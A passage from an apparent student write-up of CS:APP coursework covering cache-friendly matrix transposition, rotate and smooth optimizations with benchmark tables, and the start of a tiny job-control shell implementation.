A[1][3]	8	H	B[3][1]	24	H
A[2][0]	16	M	B[0][2]	0	H
A[2][1]	16	H	B[1][2]	8	M
A[2][2]	16	H	B[2][2]	16	M
A[2][3]	16	M	B[3][2]	24	H
A[3][0]	24	M	B[0][3]	0	H
A[3][1]	24	H	B[1][3]	8	H
A[3][2]	24	H	B[2][3]	16	M
A[3][3]	24	H	B[3][3]	24	M

Awesome! We significantly improved the miss rate. However... the new code produces caches misses 1702, which is still beyond our goal 1300. This is because we're only using 4 integers per block, and results in a 50% waste of the block size. We'd like to combine reading 8 integers each time and making full use of them to construct 4*4 matrices.

In order to do this, we still load each 8 integers for each block (i.e., each row of matrix ) into local variables. Then we only use 4 of each time, and store the rest 4 integers somewhere else. Where should we place the remaining 4 integers? Recall the cache layout for a 64*64 matrix: if we divide the 8*8 blocking into 4 sub-blocks, each of which is 4*4, we will be able to place the remaining four integers in the adjacent sub-block, in the same order the first 4 integers are written into to avoid cache conflict.

Maybe it's bettet to take a look at the code below:

int i, j, block_i, block_j;
int Temp[8];

for (i = 0; i < N; i += 8)
    for (j = 0; j < M; j +=8) {
        // 1. For first four rows of A
        for (block_i = i; block_i < i + 4; ++block_i) {
            // 2. Load full cache block -- 8 integers into local vars
            for (block_j = j; block_j < j + 8; ++block_j) {
                Temp[block_j - j] = A[block_i][block_j];
            }
            // 3. Fill the top-left 4*4 sub-block
            for (block_j = j; block_j < j + 4; ++block_j) {
                B[block_j][block_i] = Temp[block_j - j];
            }
            // 4. Store the rest four integers into the top-right 4*4 sub-block
            //    so that we avoid cache conflict
            for (block_j = j; block_j < j + 4; ++block_j) {
                B[block_j][block_i + 4] = Temp[block_j - j + 4];
            }
        }
        // 5. For the remaining four rows of A
        for (block_i = i + 4; block_i < i + 8; ++block_i) {
            // 6. Load from the top-right sub-block into local vars by row
            for (block_j = i + 4; block_j < i + 8; ++block_j) {
                Temp[block_j - i - 4] = B[j + block_i - i - 4][block_j];
            }
            // 7. Fill the top-right sub-block by row
            for (block_j = i + 4; block_j < i + 8; ++block_j) {
                B[j + block_i - i - 4][block_j] = A[block_j][j + block_i - i - 4];
            }
            // 8. Fill the bottom-left sub-block by row
            for (block_j = i; block_j < i + 4; ++block_j) {
                B[j + block_i - i][block_j] = Temp[block_j - i];
            }
            // 9. Fill the bottom-right sub-block by row
            for (block_j = i + 4; block_j < i + 8; ++block_j) {
                B[j + block_i - i][block_j] = A[block_j][j + block_i - i];
            }
        }
    }

We are always operating on a 4*4 sub-block each time switching between matrix and . By storing by row instead of by column, we can minimize the number of conflict misses at each iteration.

For the last problem, note that 61 and 67 are both prime numbers, so the cache layout for this matrix is irregular. For this reason, we simply adopt standard blocking. The remaining question is, what's the blocking's size? Just fail and try!

int i, j, block_i, block_j;
int Temp[8];

for (i = 0; i < 64; i += 16)
    for (j = 0; j < 56; j += 8) {
        for (block_i = i; block_i < i + 16; ++block_i) {
            for (block_j = j; block_j < j + 8; ++block_j) {
                Temp[block_j - j] = A[block_i][block_j];
            }
            for (block_j = j; block_j < j + 8; ++block_j) {
                B[block_j][block_i] = Temp[block_j - j];
            }
        }
    }

for (i = 64; i < 67; ++i)
    for (j = 0; j < 61; ++j) {
        B[j][i] = A[i][j];
    }

for (i = 0; i < 64; ++i)
    for (j = 56; j < 61; ++j) {
        B[j][i] = A[i][j];
    }

We use 16*8 blocking and the miss count is 1907.

Let's go back to the question: where does the miss come from? The answer is: conflict miss, the miss where the same cache block is overwritten. To deal with this problem, we can either use different cache blocks, or designing some mechanism to reduce the miss count if it's not avoidable.

The following figure shows how matrix is transformed into matrix . Matrix is partitioned by multiple blocks and these blocks are indexed from 1 to 16. Index in matrix is transformed to index in matrix . Conflict blocks are marked in color orange and non-conflict blocks are marked green.

Our goal is to minimize the conflict misses taking place in orange blocks. For matrices, we make use of local variables. For matrices, we have to employ some tricks to reduce conflicts as the cache layout becomes much more complicated.

Lab 5: Performance Lab

In this lab, you are prompted to optimize the performance of a rotation function and a convolution function for a 2D image (matrix). Basically, we will leverage the following optimization techniques: code motion, function inlining, blocking, loop unrolling, memory load reduction, etc.

Optimizing Rotation

I tried the following versions of function rotation:

naive_rotate: iterate over all rows and columns in order to rotate each element.
rotate_1: 8 * 8 blocking plus loop unrolling.
rotate_2: 8 * 8 blocking, loop unrolling, plus temporary caching.
rotate_3: 8 * 8 blocking, loop unrolling, plus marco RIDX reduction.
rotate_4: 4 * 4 blocking, loop unrolling, plus marco RIDX reduction.

void naive_rotate(int dim, pixel *src, pixel *dst) 
{
    int i, j;

    for (i = 0; i < dim; i++)
	    for (j = 0; j < dim; j++)
	        dst[RIDX(dim-1-j, i, dim)] = src[RIDX(i, j, dim)];
}

void rotate_1(int dim, pixel *src, pixel *dst) 
{
    int i, j, k;

    for (i = 0; i < dim; i += 8)
        for (j = 0; j < dim; j += 8)
            for (k = i; k < i + 8; ++k) {
                dst[RIDX(dim - 1 - j, k, dim)] = src[RIDX(k, j + 0, dim)];
                dst[RIDX(dim - 2 - j, k, dim)] = src[RIDX(k, j + 1, dim)];
                dst[RIDX(dim - 3 - j, k, dim)] = src[RIDX(k, j + 2, dim)];
                dst[RIDX(dim - 4 - j, k, dim)] = src[RIDX(k, j + 3, dim)];
                dst[RIDX(dim - 5 - j, k, dim)] = src[RIDX(k, j + 4, dim)];
                dst[RIDX(dim - 6 - j, k, dim)] = src[RIDX(k, j + 5, dim)];
                dst[RIDX(dim - 7 - j, k, dim)] = src[RIDX(k, j + 6, dim)];
                dst[RIDX(dim - 8 - j, k, dim)] = src[RIDX(k, j + 7, dim)];
            }
}

void rotate_2(int dim, pixel *src, pixel *dst) 
{
    int i, j, k;
    pixel Temp[8]; 

    for (i = 0; i < dim; i += 8)
        for (j = 0; j < dim; j += 8) {
            for (k = i; k < i + 8; ++k) {
                Temp[0] = src[RIDX(k, j + 0, dim)];
                Temp[1] = src[RIDX(k, j + 1, dim)];
                Temp[2] = src[RIDX(k, j + 2, dim)];
                Temp[3] = src[RIDX(k, j + 3, dim)];
                Temp[4] = src[RIDX(k, j + 4, dim)];
                Temp[5] = src[RIDX(k, j + 5, dim)];
                Temp[6] = src[RIDX(k, j + 6, dim)];
                Temp[7] = src[RIDX(k, j + 7, dim)];
                dst[RIDX(dim - 1 - j, k, dim)] = Temp[0];
                dst[RIDX(dim - 2 - j, k, dim)] = Temp[1];
                dst[RIDX(dim - 3 - j, k, dim)] = Temp[2]; 
                dst[RIDX(dim - 4 - j, k, dim)] = Temp[3];
                dst[RIDX(dim - 5 - j, k, dim)] = Temp[4];
                dst[RIDX(dim - 6 - j, k, dim)] = Temp[5];
                dst[RIDX(dim - 7 - j, k, dim)] = Temp[6];
                dst[RIDX(dim - 8 - j, k, dim)] = Temp[7];
            }
        }
}

void rotate_3(int dim, pixel *src, pixel *dst) 
{
    int i, j, k, d_src, d_dst;

    for (i = 0; i < dim; i += 8)
        for (j = 0; j < dim; j += 8) {
            for (k = i; k < i + 8; ++k) {
                d_src = RIDX(k, j, dim);
                d_dst = RIDX(dim - 1 - j, k, dim);
                dst[d_dst - 0 * dim] = src[d_src + 0];
                dst[d_dst - 1 * dim] = src[d_src + 1];
                dst[d_dst - 2 * dim] = src[d_src + 2];
                dst[d_dst - 3 * dim] = src[d_src + 3];
                dst[d_dst - 4 * dim] = src[d_src + 4];
                dst[d_dst - 5 * dim] = src[d_src + 5];
                dst[d_dst - 6 * dim] = src[d_src + 6];
                dst[d_dst - 7 * dim] = src[d_src + 7];
            }
        }
}

void rotate_4(int dim, pixel *src, pixel *dst) 
{
    int i, j, k, d_src, d_dst;

    for (i = 0; i < dim; i += 4)
        for (j = 0; j < dim; j += 4) {
            for (k = i; k < i + 4; ++k) {
                d_src = RIDX(k, j, dim);
                d_dst = RIDX(dim - 1 - j, k, dim);
                dst[d_dst - 0 * dim] = src[d_src + 0];
                dst[d_dst - 1 * dim] = src[d_src + 1];
                dst[d_dst - 2 * dim] = src[d_src + 2];
                dst[d_dst - 3 * dim] = src[d_src + 3];
            }
        }
}

Results are (note that your results may differ from here because of machine difference):

Rotate: Version = rotate_0: naive implementation:
Dim		        64	    128	    256	    512	    1024	Mean
Your CPEs	    1.1	    1.5	    3.3	    4.7	    6.6
Baseline CPEs	14.7	40.1	46.4	65.9	94.5
Speedup		    13.3	26.0	13.9	14.0	14.3	15.7

Rotate: Version = rotate_1: 8*8 blocking + loop unrolling:
Dim		        64	    128	    256	    512	    1024	Mean
Your CPEs	    1.2	    1.2	    1.3	    1.7	    1.7
Baseline CPEs	14.7	40.1	46.4	65.9	94.5
Speedup		    12.5	33.1	36.8	39.8	55.6	32.0

Rotate: Version = rotate_2: 8*8 blocking + loop unrolling + temporary caching:
Dim		        64	    128	    256	    512	    1024	Mean
Your CPEs	    2.5	    2.5	    2.5	    3.0	    3.3
Baseline CPEs	14.7	40.1	46.4	65.9	94.5
Speedup		    5.9	    15.8	18.2	22.1	28.6	16.1

Rotate: Version = rotate_3: 8*8 blocking + loop unrolling + marco RIDX reduced:
Dim	            64	    128     256	    512	    1024	Mean
Your CPEs	    1.2	    1.2	    1.2	    1.4	    2.1
Baseline CPEs	14.7	40.1	46.4	65.9	94.5
Speedup		    12.7	32.8	38.1	46.6	44.2	31.8

Rotate: Version = rotate_4: 4*4 blocking + loop unrolling + marco RIDX reduced:
Dim             64      128	   256	   512   	1024	Mean
Your CPEs	    1.2	    1.5	   1.5	   2.6	    4.2
Baseline CPEs	14.7	40.1   46.4	   65.9	    94.5
Speedup		    12.1	26.7   30.6	   25.3	    22.7	22.4

Summary of Your Best Scores:
  Rotate: 32.0 (rotate_1: 8*8 blocking + loop unrolling)

8 * 8 is the best blocking strategy and loop unrolling plays a critical role in optimization.

Optimizing Convolution

We compare the following convolution methods:

naive_smooth: naive implementation of convolution.
smooth_1: inlining all function calls of naive_smooth.
smooth_2: separating 4 corners and 4 boundaries.
smooth_3: separating corners/boundaries, plus loop unrolling.

Code for naive_smooth and smooth_1:

void naive_smooth(int dim, pixel *src, pixel *dst) 
{
    int i, j;

    for (i = 0; i < dim; i++)
	    for (j = 0; j < dim; j++)
	        dst[RIDX(i, j, dim)] = avg(dim, i, j, src);
}

void smooth_1(int dim, pixel *src, pixel *dst) 
{
   int i, j, block_i, block_j, block_i_start, block_i_end, block_j_start, block_j_end;
   int sum_red, sum_blue, sum_green, n;
   pixel temp;
   
   for (i = 0; i < dim; i++)
       for (j = 0; j < dim; j++) {
            sum_red = 0;
            sum_blue = 0;
            sum_green = 0;
            
            block_i_start = max(i - 1, 0);
            block_i_end   = min(i + 1, dim - 1);
            block_j_start = max(j - 1, 0);
            block_j_end   = min(j + 1, dim - 1);
            n = (block_i_end - block_i_start + 1) * (block_j_end - block_j_start + 1);

            for (block_i = block_i_start; block_i <= block_i_end; block_i++)
                for (block_j = block_j_start; block_j <= block_j_end; block_j++) {
                    temp = src[(RIDX(block_i, block_j, dim))];
                    sum_red   += (int) temp.red;
                    sum_blue  += (int) temp.blue;
                    sum_green += (int) temp.green;
                }
            
            temp.red   = sum_red / n;
            temp.green = sum_green / n;
            temp.blue  = sum_blue / n;
            dst[RIDX(i, j, dim)] = temp;
       }
}

Code for smooth_2:

void set_corners(int dim, pixel* src, pixel* dst)
{
    // Top left
    int sum_red = 0, sum_blue = 0, sum_green = 0;
    sum_red += src[0].red;       sum_blue  += src[0].blue;       sum_green += src[0].green;
    sum_red += src[1].red;       sum_blue  += src[1].blue;       sum_green += src[1].green;
    sum_red += src[dim].red;     sum_blue  += src[dim].blue;     sum_green += src[dim].green;
    sum_red += src[dim + 1].red; sum_blue  += src[dim + 1].blue; sum_green += src[dim + 1].green;
    dst[0].red = sum_red / 4;
    dst[0].blue = sum_blue / 4;
    dst[0].green = sum_green / 4;

    // Top right
    sum_red = 0, sum_blue = 0, sum_green = 0;
    sum_red += src[dim - 2].red;       sum_blue  += src[dim - 2].blue;       sum_green += src[dim - 2].green;
    sum_red += src[dim - 1].red;       sum_blue  += src[dim - 1].blue;       sum_green += src[dim - 1].green;
    sum_red += src[2 * dim - 2].red;   sum_blue  += src[2 * dim - 2].blue;   sum_green += src[2 * dim - 2].green;
    sum_red += src[2 * dim - 1].red;   sum_blue  += src[2 * dim - 1].blue;   sum_green += src[2 * dim - 1].green;
    dst[dim - 1].red = sum_red / 4;
    dst[dim - 1].blue = sum_blue / 4;
    dst[dim - 1].green = sum_green / 4;

    // Bottom left
    sum_red = 0, sum_blue = 0, sum_green = 0;
    sum_red += src[dim * (dim - 2)].red;       sum_blue  += src[dim * (dim - 2)].blue;       sum_green += src[dim * (dim - 2)].green;
    sum_red += src[dim * (dim - 2) + 1].red;   sum_blue  += src[dim * (dim - 2) + 1].blue;   sum_green += src[dim * (dim - 2) + 1].green;
    sum_red += src[dim * (dim - 1)].red;       sum_blue  += src[dim * (dim - 1)].blue;       sum_green += src[dim * (dim - 1)].green;
    sum_red += src[dim * (dim - 1) + 1].red;   sum_blue  += src[dim * (dim - 1) + 1].blue;   sum_green += src[dim * (dim - 1) + 1].green;
    dst[dim * (dim - 1)].red = sum_red / 4;
    dst[dim * (dim - 1)].blue = sum_blue / 4;
    dst[dim * (dim - 1)].green = sum_green / 4;

    // Bottom right
    sum_red = 0, sum_blue = 0, sum_green = 0;
    sum_red += src[dim * (dim - 1) - 2].red; sum_blue  += src[dim * (dim - 1) - 2].blue; sum_green += src[dim * (dim - 1) - 2].green;
    sum_red += src[dim * (dim - 1) - 1].red; sum_blue  += src[dim * (dim - 1) - 1].blue; sum_green += src[dim * (dim - 1) - 1].green;
    sum_red += src[dim * dim - 2].red;       sum_blue  += src[dim * dim - 2].blue;       sum_green += src[dim * dim - 2].green;
    sum_red += src[dim * dim - 1].red;       sum_blue  += src[dim * dim - 1].blue;       sum_green += src[dim * dim - 1].green;
    dst[dim * dim - 1].red = sum_red / 4;
    dst[dim * dim - 1].blue = sum_blue / 4;
    dst[dim * dim - 1].green = sum_green / 4;
}

void set_boundary_top(int dim, pixel* src, pixel* dst)
{
    int sum_red, sum_blue, sum_green;
    
    for (int j = 1; j < dim - 1; j++) {
        sum_red = sum_blue = sum_green = 0;

        sum_red += src[j - 1].red;       sum_blue += src[j - 1].blue;       sum_green += src[j - 1].green;
        sum_red += src[j].red;           sum_blue += src[j].blue;           sum_green += src[j].green;
        sum_red += src[j + 1].red;       sum_blue += src[j + 1].blue;       sum_green += src[j + 1].green;
        sum_red += src[j + dim - 1].red; sum_blue += src[j + dim - 1].blue; sum_green += src[j + dim - 1].green;
        sum_red += src[j + dim].red;     sum_blue += src[j + dim].blue;     sum_green += src[j + dim].green;
        sum_red += src[j + dim + 1].red; sum_blue += src[j + dim + 1].blue; sum_green += src[j + dim + 1].green;

        dst[j].red = sum_red / 6;
        dst[j].blue = sum_blue / 6;
        dst[j].green = sum_green / 6;
    }
}

void set_boundary_bottom(int dim, pixel* src, pixel* dst)
{

    int sum_red, sum_blue, sum_green, idx;
    const int _dim = dim * (dim - 1);
        
    for (int j = 1; j < dim - 1; j++) {
        sum_red = sum_blue = sum_green = 0;

        sum_red += src[_dim + j - 1].red;       sum_blue += src[_dim + j - 1].blue;       sum_green += src[_dim + j - 1].green;
        sum_red += src[_dim + j].red;           sum_blue += src[_dim + j].blue;           sum_green += src[_dim + j].green;
        sum_red += src[_dim + j + 1].red;       sum_blue += src[_dim + j + 1].blue;       sum_green += src[_dim + j + 1].green;
        sum_red += src[_dim + j - dim - 1].red; sum_blue += src[_dim + j - dim - 1].blue; sum_green += src[_dim + j - dim - 1].green;
        sum_red += src[_dim + j - dim].red;     sum_blue += src[_dim + j - dim].blue;     sum_green += src[_dim + j - dim].green;
        sum_red += src[_dim + j - dim + 1].red; sum_blue += src[_dim + j - dim + 1].blue; sum_green += src[_dim + j - dim + 1].green;
    
        idx = _dim + j;
        dst[idx].red = sum_red / 6;
        dst[idx].blue = sum_blue / 6;
        dst[idx].green = sum_green / 6;
    }
}

void set_boundary_left(int dim, pixel* src, pixel* dst)
{
    int sum_red, sum_blue, sum_green, idx;

    for (int i = 1; i < dim - 1; i++) {
        sum_red = sum_blue = sum_green = 0;

        sum_red += src[(i - 1) * dim].red;      sum_blue += src[(i - 1) * dim].blue;     sum_green += src[(i - 1) * dim].green;
        sum_red += src[(i - 1) * dim + 1].red;  sum_blue += src[(i - 1) * dim + 1].blue; sum_green += src[(i - 1) * dim + 1].green;
        sum_red += src[i * dim].red;            sum_blue += src[i * dim].blue;           sum_green += src[i * dim].green;
        sum_red += src[i * dim + 1].red;        sum_blue += src[i * dim + 1].blue;       sum_green += src[i * dim + 1].green;
        sum_red += src[(i + 1) * dim].red;      sum_blue += src[(i + 1) * dim].blue;     sum_green += src[(i + 1) * dim].green;
        sum_red += src[(i + 1) * dim + 1].red;  sum_blue += src[(i + 1) * dim + 1].blue; sum_green += src[(i + 1) * dim + 1].green;

        idx = i * dim;
        dst[idx].red = sum_red / 6;
        dst[idx].blue = sum_blue / 6;
        dst[idx].green = sum_green / 6;
    }
}

void set_boundary_right(int dim, pixel* src, pixel* dst)
{

    int sum_red, sum_blue, sum_green, idx;

    for (int i = 1; i < dim - 1; i++) {
        sum_red = sum_blue = sum_green = 0;

        sum_red += src[i * dim - 1].red;       sum_blue += src[i * dim - 1].blue;       sum_green += src[i * dim - 1].green;
        sum_red += src[i * dim - 2].red;       sum_blue += src[i * dim - 2].blue;       sum_green += src[i * dim - 2].green;
        sum_red += src[(i + 1) * dim - 1].red; sum_blue += src[(i + 1) * dim - 1].blue; sum_green += src[(i + 1) * dim - 1].green;
        sum_red += src[(i + 1) * dim - 2].red; sum_blue += src[(i + 1) * dim - 2].blue; sum_green += src[(i + 1) * dim - 2].green;
        sum_red += src[(i + 2) * dim - 1].red; sum_blue += src[(i + 2) * dim - 1].blue; sum_green += src[(i + 2) * dim - 1].green;
        sum_red += src[(i + 2) * dim - 2].red; sum_blue += src[(i + 2) * dim - 2].blue; sum_green += src[(i + 2) * dim - 2].green;

        idx = (i + 1) * dim - 1;
        dst[idx].red = sum_red / 6;
        dst[idx].blue = sum_blue / 6;
        dst[idx].green = sum_green / 6;
    }
}

void set_inner(int dim, pixel* src, pixel* dst)
{
    int i, j, block_i, block_j, idx;
    int sum_red, sum_blue, sum_green;

    for (i = 1; i < dim - 1; i++)
        for (j = 1; j < dim - 1; j++) {
            sum_red = sum_blue = sum_green = 0;

            for (block_i = i - 1; block_i <= i + 1; block_i++)
                for (block_j = j - 1; block_j <= j + 1; block_j++) {
                    idx = RIDX(block_i, block_j, dim);
                    sum_red += src[idx].red;
                    sum_blue += src[idx].blue;
                    sum_green += src[idx].green;
                }

            idx = RIDX(i, j, dim);
            dst[idx].red = sum_red / 9;
            dst[idx].blue = sum_blue / 9;
            dst[idx].green = sum_green / 9;
        }
}

void smooth_2(int dim, pixel *src, pixel *dst) 
{
    set_corners(dim, src, dst);
    set_boundary_top(dim, src, dst);
    set_boundary_bottom(dim, src, dst);
    set_boundary_left(dim, src, dst);
    set_boundary_right(dim, src, dst);
    set_inner(dim, src, dst);
}

Code for smooth_3:

void set_inner_unrolling(int dim, pixel* src, pixel* dst)
{
    int i, j, idx;
    int sum_red, sum_blue, sum_green;

    for (i = 1; i < dim - 1; i++)
        for (j = 1; j < dim - 1; j++) {
            sum_red = sum_blue = sum_green = 0;
            
            idx = RIDX(i - 1, j - 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i - 1, j    , dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i - 1, j + 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i    , j - 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i    , j    , dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i    , j + 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i + 1, j - 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i + 1, j    , dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;
            idx = RIDX(i + 1, j + 1, dim); sum_red += src[idx].red; sum_blue += src[idx].blue; sum_green += src[idx].green;

            idx = RIDX(i, j, dim);
            dst[idx].red = sum_red / 9;
            dst[idx].blue = sum_blue / 9;
            dst[idx].green = sum_green / 9;
        }
}

void smooth_3(int dim, pixel *src, pixel *dst) 
{
    set_corners(dim, src, dst);
    set_boundary_top(dim, src, dst);
    set_boundary_bottom(dim, src, dst);
    set_boundary_left(dim, src, dst);
    set_boundary_right(dim, src, dst);
    set_inner_unrolling(dim, src, dst);

}

Results:

Smooth: Version = smooth_0: naive implementation:
Dim		        32	    64	    128	    256	    512	    Mean
Your CPEs	    16.0	15.7	16.0	16.0	15.7
Baseline CPEs	695.0	698.0	702.0	717.0	722.0
Speedup		    43.4	44.4	44.0	44.9	46.0	44.5

Smooth: Version = smooth_1: no function calls:
Dim		        32	    64	    128	    256	    512	    Mean
Your CPEs	    16.2	15.7	16.0	15.5	15.7
Baseline CPEs	695.0	698.0	702.0	717.0	722.0
Speedup		    43.0	44.4	43.8	46.3	46.0	44.7

Smooth: Version = smooth_2: boundary separation:
Dim		        32	    64	    128	    256	    512	    Mean
Your CPEs	    12.3	11.9	11.4	12.0	12.1
Baseline CPEs	695.0	698.0	702.0	717.0	722.0
Speedup		    56.5	58.6	61.6	59.9	59.7	59.2

Smooth: Version = smooth_3: boundary separtion + loop unrolling:
Dim		        32	    64	    128	    256	    512	    Mean
Your CPEs	    7.3	    7.3	    7.7	    7.3	    7.5
Baseline CPEs	695.0	698.0	702.0	717.0	722.0
Speedup		    95.5	95.9	91.2	97.6	96.7	95.3

Summary of Your Best Scores:
  Smooth: 95.3 (smooth_3: boundary separtion + loop unrolling)

Loop unrolling again significantly improves the performance of our function. You can also try some advanced convolution algorithms such as Winograd convolution and FFT if you're interested.

Lab 6: Shell Lab

You task is to write a simple shell that is able to perform foreground and background jobs. There is not too much you should be particularly careful of in this lab, but just to get yourself familiar with the following functions (operations):

In eval(char*), block SIGCHLD before fork() and unblock it afterward.
Use setpid(0, 0) in the child process to assign a unique group pid to it.
Pass -pid to the first argument of function kill() so that it operates on the group level.
Use sleep(), or better sigsuspend() in waitfg() to pause the main process waiting for foreground child process.
Use WIFSTOPPED, WIFSIGNALED and WIFEXITED in sigchld_handler to test the state of child processes: whether they are stopped, terminated or exited.
Use sigprocmask() to block all signals in sigchld_handler. This should be applied to sigint_handler and sigtstp_handler as well.

/* 
 * tsh - A tiny shell program with job control
 * 
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

/* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
#define MAXJID    1<<16   /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/* 
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

/* Global variables */
extern char **environ;      /* defined in libc */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output */
int nextjid = 1;            /* next job ID to allocate */
char sbuf[MAXLINE];         /* for composing sprintf messages */

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */

volatile pid_t fg_pid;
volatile sig_atomic_t fg_state = 1;
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char *cmdline);
int builtin_cmd(char **argv);
void do_kill(char **argv);
void do_bgfg(char **argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char *cmdline, char **argv); 
void sigquit_handler(int sig);

void clearjob(struct job_t *job);
void initjobs(struct job_t *jobs);
int maxjid(struct job_t *jobs); 
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline);
int deletejob(struct job_t *jobs, pid_t pid); 
pid_t fgpid(struct job_t *jobs);
struct job_t *getjobpid(struct job_t *jobs, pid_t pid);
struct job_t *getjobjid(struct job_t *jobs, int jid); 
int pid2jid(pid_t pid); 
pid_t jid2pid(int jid);
void listjobs(struct job_t *jobs);
void list_cont_bgjob(struct job_t* job);
void list_terminated_fgjob(struct job_t* job);
void list_stopped_fgjob(struct job_t* job);

void usage(void);
void unix_error(char *msg);
void app_error(char *msg);
typedef void handler_t(int);
handler_t *Signal(int signum, handler_t *handler);

/*
 * main - The shell's main routine 
 */
int main(int argc, char **argv) 
{
    char c;
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line */
    while ((c = getopt(argc, argv, "hvp")) != EOF) {
        switch (c) {
        case 'h':             /* print help message */
            usage();
	    break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
	    break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
	    break;
	default:
            usage();
	}
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT,  sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler); 

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {
	/* Read command line */
	if (emit_prompt) {
	    printf("%s", prompt);
	    fflush(stdout);
	}
	if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
	    app_error("fgets error");
	if (feof(stdin)) { /* End of file (ctrl-d) */
	    fflush(stdout);
	    exit(0);
	}

	/* Evaluate the command line */
	eval(cmdline);
	fflush(stdout);
	fflush(stdout);
    } 

    exit(0); /* control never reaches here */
}
  
/* 
 * eval - Evaluate the command line that the user has just typed in
 * 
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.  
*/
void eval(char *cmdline) 
{
    fflush(stdout);
    char* argv[MAXARGS];  // Argument list for execve()
    char buf[MAXLINE];    // Holds modified command line
    int bg;               // Run in bg or fg
    pid_t pid;            // Process id
    
    strcpy(buf, cmdline);
    bg = parseline(buf, argv);
    if (argv[0] == NULL)
        return;           // Ignore empty lines
    
    sigset_t mask_all, mask, prev;
    sigfillset (&mask_all);
    sigemptyset (&mask);
    sigaddset (&mask, SIGCHLD);

    if (!builtin_cmd(argv)) {
        sigprocmask (SIG_BLOCK, &mask, &prev);
        if ((pid = fork()) == 0) {
            sigprocmask (SIG_SETMASK, &prev, NULL);
            setpgid (0, 0);
            if (execve(argv[0], argv, environ) < 0) {
                printf("%s: Command not found.\n", argv[0]);
                exit(0);
            }
        }
        
        sigprocmask (SIG_BLOCK, &mask_all, NULL);
        int state = bg ? BG : FG;
        addjob (jobs, pid, state, cmdline);
        sigprocmask (SIG_SETMASK, &prev, NULL);

        // Parent waits for fg job to terminate
        if (!bg) {
            waitfg (pid);
        } 
        else {
            list_cont_bgjob(getjobpid(jobs, pid));
        }
    }
    return;
}

/* 
 * parseline - Parse the command line and build the argv array.
 * 
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job.  
 */
int parseline(const char *cmdline, char **argv) 
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char *buf = array;          /* ptr that traverses command line */
    char *delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf)-1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
	buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') {
	buf++;
	delim = strchr(buf, '\'');
    }
    else {
	delim = strchr(buf, ' ');
    }

    while (delim) {
	argv[argc++] = buf;
	*delim = '\0';
	buf = delim + 1;
	while (*buf && (*buf == ' ')) /* ignore spaces */
	       buf++;

	if (*buf == '\'') {
	    buf++;
	    delim = strchr(buf, '\'');
	}
	else {
	    delim = strchr(buf, ' ');
	}
    }
    argv[argc] = NULL;
    
    if (argc == 0)  /* ignore blank line */
	return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc-1] == '&')) != 0) {
	argv[--argc] = NULL;
    }
    return bg;
}

/* 
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately.  
 */
int builtin_cmd(char **argv) 
{
    if (!strcmp(argv[0], "quit"))
        exit(0);
    if (!strcmp(argv[0], "jobs")) {
        listjobs(jobs);
        return 1;
    }
    if (!strcmp(argv[0], "fg")) {
        do_bgfg(argv);
        return 1;
